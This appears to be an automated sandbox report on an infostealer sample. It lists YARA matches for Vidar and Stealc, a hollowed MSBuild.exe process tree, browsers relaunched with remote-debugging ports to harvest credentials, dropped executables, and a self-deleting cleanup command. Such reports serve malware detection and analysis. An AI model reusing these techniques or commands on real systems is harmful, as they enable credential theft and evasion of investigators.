Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E9316A 32_2_61E9316A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E9F0ED 32_2_61E9F0ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EA70CF 32_2_61EA70CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E9D0C3 32_2_61E9D0C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E8D0B6 32_2_61E8D0B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E6904E 32_2_61E6904E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E4304E 32_2_61E4304E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E15337 32_2_61E15337
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E19208 32_2_61E19208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E534E3 32_2_61E534E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E77452 32_2_61E77452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E37930 32_2_61E37930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E7B85E 32_2_61E7B85E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E21816 32_2_61E21816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E9FBF0 32_2_61E9FBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E55BD7 32_2_61E55BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EA5B62 32_2_61EA5B62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E91DC1 32_2_61E91DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E6DDA5 32_2_61E6DDA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E31DAB 32_2_61E31DAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E95D7A 32_2_61E95D7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E5BC4C 32_2_61E5BC4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E25FA2 32_2_61E25FA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E1DEC2 32_2_61E1DEC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E69E8F 32_2_61E69E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E89E0E 32_2_61E89E0E
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0041AEF0 appears 102 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00404980 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040F5B0 appears 135 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040B350 appears 52 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00410D00 appears 42 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8788 -s 804
Yara signature match
Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 32.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: 32.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: 00000020.00000002.2338379546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: 00000003.00000002.1838657212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: v7942.exe Static PE information: Section: .bss ZLIB complexity 1.0003622159090908
Source: l9543[1].exe.3.dr Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: ph4eu37qie.exe.3.dr Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: zmgdjecba1.exe.3.dr Static PE information: Section: .bss ZLIB complexity 1.00032958984375
Source: s9471[1].exe.3.dr Static PE information: Section: .bss ZLIB complexity 1.00032958984375
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@117/281@55/27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411250 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle, 3_2_00411250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00439160 CoCreateInstance, 29_2_00439160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\WXNWV2WQ.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8780
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:20756:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8788
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\22c5c763-c786-4220-b732-9c184e87cd3a.tmp Jump to behavior
Source: v7942.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: chrome.exe, 00000009.00000002.1501055495.0000627400865000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2030298564.00000E7C00D21000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: IEBAAFCAFCBKFHJJJKKF.32.dr, kfuaiwtjm.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000020.00000002.2667607407.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2535479412.000000000364D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: v7942.exe Virustotal: Detection: 49%
Source: v7942.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\v7942.exe File read: C:\Users\user\Desktop\v7942.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\v7942.exe "C:\Users\user\Desktop\v7942.exe"
Source: C:\Users\user\Desktop\v7942.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\v7942.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\v7942.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2160,i,2848418510720088059,16608843499343941724,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2504 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2160,i,2848418510720088059,16608843499343941724,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5244 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2356,i,4967354887720745287,8533781015737576862,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2440,i,7459557275228332254,17977652345810778728,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6744 --field-trial-handle=2440,i,7459557275228332254,17977652345810778728,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6848 --field-trial-handle=2440,i,7459557275228332254,17977652345810778728,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\ph4eu37qie.exe "C:\ProgramData\ph4eu37qie.exe"
Source: C:\ProgramData\ph4eu37qie.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\ph4eu37qie.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\ph4eu37qie.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\zmgdjecba1.exe "C:\ProgramData\zmgdjecba1.exe"
Source: C:\ProgramData\zmgdjecba1.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\zmgdjecba1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\xlng4w479r.exe "C:\ProgramData\xlng4w479r.exe"
Source: C:\ProgramData\xlng4w479r.exe Process created: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe 0
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Process created: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe 8788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8788 -s 804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\f3ohl" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2348,i,1823826932740669469,7503870437745622031,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2440 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 11
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2348,i,1823826932740669469,7503870437745622031,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5348 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe "C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8780 -s 644
Source: C:\Users\user\Desktop\v7942.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\ph4eu37qie.exe "C:\ProgramData\ph4eu37qie.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\zmgdjecba1.exe "C:\ProgramData\zmgdjecba1.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\xlng4w479r.exe "C:\ProgramData\xlng4w479r.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\f3ohl" & exit Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2160,i,2848418510720088059,16608843499343941724,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2504 /prefetch:3 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2160,i,2848418510720088059,16608843499343941724,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5244 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2356,i,4967354887720745287,8533781015737576862,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2440,i,7459557275228332254,17977652345810778728,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6744 --field-trial-handle=2440,i,7459557275228332254,17977652345810778728,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6848 --field-trial-handle=2440,i,7459557275228332254,17977652345810778728,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\ProgramData\zmgdjecba1.exe "C:\ProgramData\zmgdjecba1.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
